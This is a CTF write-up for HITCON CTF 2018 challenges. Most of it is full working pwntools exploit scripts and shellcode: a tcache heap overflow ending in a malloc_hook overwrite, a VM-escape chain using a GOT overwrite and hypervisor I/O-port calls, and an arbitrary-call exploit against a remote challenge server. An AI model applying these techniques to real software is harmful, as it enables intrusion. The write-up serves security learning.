HITCON CTF 2018

9 minute read

Pwn

Children TCache

The program is simple, we can create, show, and delete heaps. But it will use 0xDA to overwrite the clean the whole chunk. The vulnerability is a null-byte-overflow in scanf:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *_malloc_ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
...
  read_data((__int64)&s, size);
  strcpy(_malloc_ptr, &s);
...
}

To exploit it, we need to:

from pwn import *

# Geeral Operation
def _new(size, data, attack=False):
    p.sendlineafter('Your choice: ', '1')
    p.sendlineafter('Size:', str(size))
    p.sendlineafter('Data:', data)

def _show(index):
    p.sendlineafter('Your choice: ', '2')
    p.sendlineafter('Index:', str(index))

def _del(index):
    p.sendlineafter('Your choice: ', '3')
    p.sendlineafter('Index:', str(index))

p = process('./children_tcache', env = {'LD_PRELOAD': './libc.so.6'})
#gdb.attach(p)

# Set buffers, we will use chunk B to overwrite the prev_size of chunk C to merge it with chunk A
# Chunk d is used to prevent merging
_new(0x600, 'A' * 0x5ff)
_new(0x68, 'B' * 0x67)
_new(0x5f0, 'C' * 0x5ef)
_new(0x20, 'd' * 0x20)

# Phase 1

# Put chunk B to TCache, chunk A to unsorted bin
_del(1)
_del(0)

# When the programm frees a chunk, it will write junk byte to write the chunk
# Here, we use null byte overflow to clean the junk data bit by bit and
# overflow the chunk C
for i in range(0, 8):
    _new(0x68 - i, 'b' * (0x68 - i))
    _del(0)

# Overwrite the pre_size to 0x680, which will lead to the merge of chunk A and C
# And chunk B is overlapped inside two chunks
_new(0x68, 'B' * 0x60 + p64(0x680))
_del(2)

# Phase 2

# The new applied chunk is bigger than A, so the malloc won't use it
# So, the fake chunk(mereged by A and C) can split partial of it
# The libc address will be write to the remaining of fake chunk
# While the offset exactly points to chunk B
# We can show chunk B to leak libc address.
_new(0x608, 'E' * 0x607)
_show(0)

# Use offset to calculate base address and malloc_hookl
libc_addr = p.recvuntil('\n$$')[:-3]
libc_addr = u64(libc_addr + '\x00' * (8 - len(libc_addr))) - 0x3ebca0
malloc_hook = libc_addr + 0x3ebc30

# Since the offset directly points to chunk B, if we malloc 0x68
# the unsorted bin will split again and new chunk F exactly chunk B
# Thus, if we free chunk F and chunk B, we can have a double free
_new(0x68, 'F' * 0x67)
_del(0)
_del(2)

# Overwrite mallok_hook
_new(0x68, p64(malloc_hook))
_new(0x68, 'G' * 0x67)
_new(0x68, p64(libc_addr + 0x4f322))

# Trigger malloc_hook
p.sendlineafter('Your choice: ', '1')
p.sendlineafter('Size:', '1')
p.interactive()

Here is an analyze in diagram, I ignore their PREV_IN_USE byte and just write applied size:

Phase 1 (All in use)
+------------------------------+
|       Chunk A(0x600)         |
+------------------------------+
|             ...              | 
|             ...              | 
+------------------------------+
|       Chunk B(0x68)          |
+------------------------------+
|             ...              | 
|             ...              | 
+------------------------------+
|       Chunk C(0x5f0)         |
+------------------------------+
|             ...              | 
|             ...              | 
+------------------------------+
|       Chunk d(0x20)          |
+------------------------------+
................................
................................ -> Prevent to merge, so ignore
+------------------------------+

Phase 2 (Chunk A, Chunk C Merged)
+------------------------------+
|       Chunk A(0x600)         +------------------+
+------------------------------+                  |
|             ...              |                  |
|            0x600             |                  |
+------------------------------+                  |
|       Chunk B(0x68)          |                  |
+------------------------------+                  |
|             ...              |                  | -> Fake Chunk
|             ...              |                  |
|            0x680             | -> PREV_SIZE     |
+------------------------------+                  |
|       Chunk C(0x5f0)         |                  |
+------------------------------+                  |
|             ...              |                  |
|             ...              +------------------+
+------------------------------+
|       Chunk d(0x20)          |
+------------------------------+
................................
................................
+------------------------------+

Phase 3 (Split the chunk and leak libc address)
+------------------------------+
|       Chunk A(0x600)         +-----------------------+
+------------------------------+                       |
|             ...              |                       | Chunk E(0x608)
|            0x600             |                       |
+------------------------------+                       |
|       Chunk B(0x68)          +-----------------------+
+------------------------------+                       |
|    address to main_arena     | -> Leak               | Remain Unsorted Bin
|             ...              |                       |
|            0x680             | -> PREV_SIZE          |
+------------------------------+                       |
|       Chunk C(0x5f0)         |                       |
+------------------------------+                       |
|             ...              |                       |
|             ...              |                       |
+------------------------------------------------------+
|       Chunk d(0x20)          |
+------------------------------+
................................
................................
+------------------------------+

Phase 4 (Double Free)
The diagram is almost the same as previous one, 
but the main_arena address is changed to fake chunk address

Abyss

Overview

This is a VM escape challenge. The challenge provides us hypervisor, a custom kernel, and user.elf.

The user.elf overview:

__int64 work()
{
  int _result; // eax
  __int64 v1; // rdi
  __int64 _argument; // rdi
  __int64 (__fastcall *_command)(); // rax
  __int64 result; // rax
  int _length; // [rsp+Ch] [rbp-4h]

  _length = strlen(bss_user_input);
  for ( bss_i = 0; ; ++bss_i )
  {
    result = (unsigned int)bss_i;
    if ( _length <= bss_i )
      break;
    if ( (*__ctype_b_loc())[(unsigned __int8)bss_user_input[bss_i]] & 0x800 )
    {
      _result = fetch_int();
      push(_result);
    }
    else if ( (unsigned __int8)bss_user_input[bss_i] <= 0x60u || (unsigned __int8)bss_user_input[bss_i] > 0x7Au )
    {
      v1 = (unsigned int)bss_user_input[bss_i];
      if ( commands() )
      {
        _argument = (unsigned int)bss_user_input[bss_i];
        _command = commands();
        ((void (__fastcall *)(__int64))_command)(_argument);
      }
    }
    else
    {
      push((unsigned __int8)bss_user_input[bss_i] - 97);
    }
  }
  return result;
}

And we have following operations:

__int64 (__fastcall *commands())()
{
  __int64 (__fastcall *result)(); // rax

  switch ( (unsigned int)off_11CC )
  {
    case 0x24u:
      result = (__int64 (__fastcall *)())dup_;
      break;
    case 0x25u:
      result = (__int64 (__fastcall *)())pop_;
      break;
    case 0x26u:
      result = and_;
      break;
    case 0x2Au:
      result = mul;
      break;
    case 0x2Bu:
      result = (__int64 (__fastcall *)())add;
      break;
    case 0x2Cu:
      result = (__int64 (__fastcall *)())write_;
      break;
    case 0x2Du:
      result = minus;
      break;
    case 0x2Eu:
      result = (__int64 (__fastcall *)())writed;
      break;
    case 0x2Fu:
      result = div_;
      break;
    case 0x3Au:
      result = (__int64 (__fastcall *)())store;
      break;
    case 0x3Bu:
      result = (__int64 (__fastcall *)())fetch;
      break;
    case 0x3Du:
      result = (__int64 (__fastcall *)())eql;
      break;
    case 0x3Eu:
      result = (__int64 (__fastcall *)())gt;
      break;
    case 0x40u:
      result = (__int64 (__fastcall *)())rot;
      break;
    case 0x5Cu:
      result = (__int64 (__fastcall *)())swap_;
      break;
    case 0x5Fu:
      result = neg;
      break;
    case 0x7Cu:
      result = (__int64 (__fastcall *)())or_;
      break;
    case 0x7Eu:
      result = (__int64 (__fastcall *)())not_;
      break;
    default:
      result = 0LL;
      break;
  }
  return result;
}

They allow us to add, div, mul, and etc. Not all the commands are required, we will only explains instructions helpful to exploit.

Level 1

The key part is in swap:

unsigned int *swap_()
{
  unsigned int v0; // ST04_4
  unsigned int *result; // rax

  v0 = stack_ptr[machine - 1];
  stack_ptr[machine - 1] = stack_ptr[machine - 2];
  result = stack_ptr;
  stack_ptr[machine - 2] = v0;
  return result;
}

If we pass 1 as argument. we can swap array[0] and array[-1]. Let’s see what we will swap:

.bss:00000000002020A4 ; unsigned int stack_ptr[1]
.bss:00000000002020A4 stack_ptr       dd ?                    ; DATA XREF: push+2D↑o
.bss:00000000002020A4                                         ; pop+34↑o ...
.bss:00000000002020A8 ; _DWORD stack[1023]
.bss:00000000002020A8 _stack          dd 3FFh dup(?)          ; DATA XREF: store+40↑o
.bss:00000000002020A8                                         ; fetch+34↑o
.bss:00000000002030A4 ; char bss_user_input[1024]
.bss:00000000002030A4 bss_user_input  db 400h dup(?)          ; DATA XREF: fetch_int+28↑o
.bss:00000000002030A4                                         ; fetch_int+5E↑o ...
.bss:00000000002034A4 bss_index       dd ?                    ; DATA XREF: pick_+1C↑r
.bss:00000000002034A4          

stack_ptr is right before _stack. We can control the stack pointer now. Also, although checksec indicates the program is N^X, the custom kernel will not turn on N^X. While the RELRO is partial, we can overwrite it to execute shell.

The program cannot be leaked, but the relative addresses are always the same. When .got is not initialized, it will point to the .plt address, we can add a value to the unresolved .got (like printf) to move it from .plt to .bss. Then execute the function to jump to shellcode.

import sys
from pwn import *

p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split())

f = open('shellcode')
exploit = f.read()
f.close()

# Change the .got and append shellcode
exploit = "4294967268\\2107670+a\\31337\\31337\\31337\." + exploit
p.sendline(exploit)
p.recvuntil('hitcon')
flag = p.recvall()

print flag

Use nasm source.asm -p shellcode

BITS 64

times 40 nop

; open flag
push   0x67616c66
push   0x2
pop    rax
mov    rdi,rsp
xor    rsi, rsi
syscall

; read flag
mov    r9,rax
xor    rax,rax
mov    rdi,r9
mov    rsi,rsp
xor    rdx,rdx
mov    dl,0x40
syscall

; write flag
xor    rax,rax
inc    al
xor    rdi,rdi
inc    rdi
mov    rsi,rsp
xor    rdx,rdx
mov    dl,0x40
syscall

Level 2

Now, we need to discuss the implementation of hypervisor:

void __fastcall sub_171A(__int64 a1)
{
  __int64 v1; // rax

  while ( 1 )
  {
    ioctl(*(_DWORD *)(a1 + 16), 0xAE80uLL, 0LL);
    v1 = *(unsigned int *)(*(_QWORD *)(a1 + 24) + 8LL);
    switch ( (unsigned int)off_2CB4 )
    {
      case 2u:
        if ( *(_WORD *)(*(_QWORD *)(a1 + 24) + 34LL) >= 0 )
        {
          fprintf(stderr, "Unhandled I/O port: 0x%x\n", *(unsigned __int16 *)(*(_QWORD *)(a1 + 24) + 34LL));
          exit(1);
        }
        if ( (signed int)sub_1C7E(*(_WORD *)(*(_QWORD *)(a1 + 24) + 34LL), a1) < 0 )
        {
          fwrite("Hypercall failed\n", 1uLL, 0x11uLL, stderr);
          exit(1);
        }
        return;
      case 5u:
        fwrite("KVM_EXIT_HLT\n", 1uLL, 0xDuLL, stderr);
        exit(0);
        return;
      case 8u:
        fwrite("KVM_EXIT_SHUTDOWN\n", 1uLL, 0x12uLL, stderr);
        exit(1);
        return;
      case 9u:
        fprintf(
          stderr,
          "KVM_EXIT_FAIL_ENTRY: hardware_entry_failure_reason = 0x%llx\n",
          *(_QWORD *)(*(_QWORD *)(a1 + 24) + 32LL));
        exit(1);
        return;
      case 0x11u:
        fprintf(stderr, "KVM_EXIT_INTERNAL_ERROR: suberror = 0x%x\n", *(unsigned int *)(*(_QWORD *)(a1 + 24) + 32LL));
        exit(1);
        return;
      default:
        fprintf(stderr, "Unhandled reason: %d\n", *(unsigned int *)(*(_QWORD *)(a1 + 24) + 8LL));
        exit(1);
        return;
    }
  }

The code is raw decompile code. Its main purpose is handling the syscall in kernel by communicating via IO ports. The port is 0x8000 + syscall number. If we write to those ports, we can use hypervisor to directly access flag file.

When the kernel checks the whitelist, it will prevent our flag2 string. However, the string will not be erased and stay in a stable location. Thus, we can pass that address to hypervisor and open file:

BITS 64

db '4294967268\2107670+a\31337\31337\31337\.'
times 20 nop

;try open the flag, it will leak "flag2" in memory
mov rax, 0x101010101010101
push rax
mov rax, 0x101013366606d67
xor [rsp], rax
xor rax, rax
mov al, 2
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
syscall

;use IO port to connect hypervisor
xor rdx, rdx
xor rcx, rcx
mov dx, 0x4444
mov cx, 0xc444
xor rdx, rcx
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101214281
xor [rsp], rax
pop rax
out dx, eax

;read flag to buf
xor rax, rax
xor rdi, rdi
mov dil, 3
mov rsi, rsp
xor rdx, rdx
mov dl, 64
syscall

;write content to stdout
xor rax, rax
inc rax
xor rdi, rdi
inc rdi
mov rsi, rsp
xor rdx, rdx
mov dl, 64
syscall

Super Hexagon EL 0

The program gives us a bios.bin to run. And the arch is ARM. And the vm provides us a storage service. We can give an index and a value to store or show.

Let’s first decode the bios.bin:

binwalk bios.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------
143472        0x23070         SHA256 hash constants, little endian
770064        0xBC010         ELF, 64-bit LSB executable, version 1 (SYSV)

We can extract it via dd:

dd if=./bios.bin of=./bios.elf skip=770064 bs=1

Now, we can load it to IDA pro and decompile it:

void __cdecl run()
{
  __int64 v0; // x2
  int idx; // [xsp+28h] [xbp+28h]
  int cmd; // [xsp+2Ch] [xbp+2Ch]

  printf("cmd> ");
  scanf("%d", &cmd);
  printf("index: ");
  scanf("%d", &idx);
  if ( cmd == 1 )
  {
    printf("key: ");
    scanf("%s", buf);
    v0 = (unsigned int)strlen(buf);
  }
  else
  {
    v0 = 0LL;
  }
  ((void (__fastcall *)(unsigned __int8 *, _QWORD, __int64))cmdtb[cmd])(buf, (unsigned int)idx, v0);
}

Also, there is a print_flag function at 0x400104. Since there is no restriction in number, we can do arbitrary call via ((void (__fastcall *)(unsigned __int8 *, _QWORD, __int64))cmdtb[cmd]). Since the value is in stack with ASLR. We can first set cmd to our input idx, which contains the address of print_flag. Then, the flag will be printed.

THe final exploit:

from pwn import *
r = remote('52.195.11.111', 6666)
 
# -32 is the offset to idx, jump to it
r.sendlineafter('cmd> ', '-32')

# send the address of print flag
r.sendlineafter('index: ', p64(0x400104))
 
# print flag will be called
print r.recvall()

Misc

EV3 Basic

In package from host to controller, I found some chars which match the given partial flag in each package. Group them together you can find the flag.

Leave a comment